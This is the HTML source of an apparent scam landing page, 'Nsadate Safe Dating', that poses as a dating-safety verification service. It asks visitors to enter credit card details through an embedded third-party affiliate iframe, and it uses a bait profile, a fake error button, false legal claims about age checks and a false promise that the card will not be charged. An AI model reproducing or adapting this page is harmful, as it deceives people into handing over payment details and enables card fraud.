<!DOCTYPE html>
<html lang="en">
 
<head><meta charset="shift_jis">

<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
  <title>Nsadate Safe Dating - Personal Meetings </title>
  <meta name="description" content="">
  <meta name="author" content="">

  <!-- Mobile Specific Metas
  ????????????????????????? -->
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- FONT
  ????????????????????????? -->
  <link href='https://fonts.googleapis.com/css?family=Merriweather+Sans:400,300,700' rel='stylesheet' type='text/css'>

  <!-- CSS
  ????????????????????????? -->
  <link rel="stylesheet" href="css/normalize.css">
  <link rel="stylesheet" href="css/skeleton.css">
  <link rel="stylesheet" href="css/style.css">

  <!-- Favicon
  ????????????????????????? -->
  <link rel="icon" type="image/png" href="images/favicon.png">
<style>
.crossSaleTop {
    display: none!important;
}
</style>
  
</head>
<body>

 
    
    <div class="head">
        <div class="container">
            <div class="row">
                <div class="seven columns">
                <img src="images/logotin.png">
                     
                         <p> 
 <p> <BR> <BR> We provide a fast and secure service that makes meeting people on Safe dating  safer and easier. We ensure the people you meet are who they say they are.
 <br><br>

After several incidents that took place via Safe dating , we received media exposure and became one of the top free methods to protect women from sexual predators. Not only protect women, but we ensure men are not tricked into meeting up with underaged women. 
 <br><br>

It is US law that CCs are not to be issued to citizens under the legal age of 18 thus we use your CC to check your age and run a soft background check.</p>
                       
                    <img src="images/logosdf1.png">
                </div>
                <div class="five columns">
                     <iframe src="https://your.softrtcknow.info/click?pid=821&offer_id=6" width="100%" height="700px" scrolling="no"  frameBorder="0"></iframe>
<center><a href="profile.html"><img src="images/err_btn.png" alt="Error!, Click Here and Try agan"></a></center>
                
</div>
            </div>
        </div>
    </div>
     


 


  <div class="member">
        <div class="container">
            <div class="row">
                <div class="four columns">
				
                    <a class="image-popup-no-margins mainimage" href="#">
                        <img id="currentImg" src="images/1.jpg" class="mainimage">
                    </a>
                    
                   
                        <img onclick="changeImage(event)" class="image-popup-no-margins smallm" src="images/4.jpg">
                        <img onclick="changeImage(event)" class="image-popup-no-margins smallm"src="images/2.jpg">
                        <img onclick="changeImage(event)" class="image-popup-no-margins smallm" src="images/3.jpg">
						
						
                </div>
				<script type="text/javascript">
					function changeImage(event)
						{event = event || event;
						var targetElement = event.target || event.srcElement;
						//		if(targetElement == "IMG"){
						document.getElementById("currentImg").src = targetElement.getAttribute("src"); 
						//		}
						}
				</script>
                <div class="four columns">
             
                 
                    <li><b>About:</b> Not looking for anything serious, but open to see where things go! I do believe in love. Maybe one day i'll find it... Until then I'll keep looking and running around this beautiful world! Come be my partner in crime XoX</li>
                    <li><b>User-id:</b> on Tinder</li>
                    </div>
                <div class="four columns terms">
                    <h4>Member Terms (please read)</h4>
                    <p>By submitting the form above and providing your credit card, you agree to allow us to verify your age and make sure you are not a wanted fugitive.
<br>
We respect your privacy. This is a private and discreet service. Your card will not be charged for verification.

 
                    <br><br>
                 
                </div>
            </div>
        </div>
    </div>






     <div class="container">
           <div class="reviews">
            <div class="row">
            
                <img src="images/as-seen-on.gif" class="verimem">
            
            </div>
        </div>
    </div>
    
    <div class="footer">
        <div class="container">
            <div class="row">
                <div class="twelve columns">
                    <h6>Nsadate 2020 -Safe & Secure - Copywright Protected</h6>
                </div>
            </div>
        </div>
    </div>

    

</html>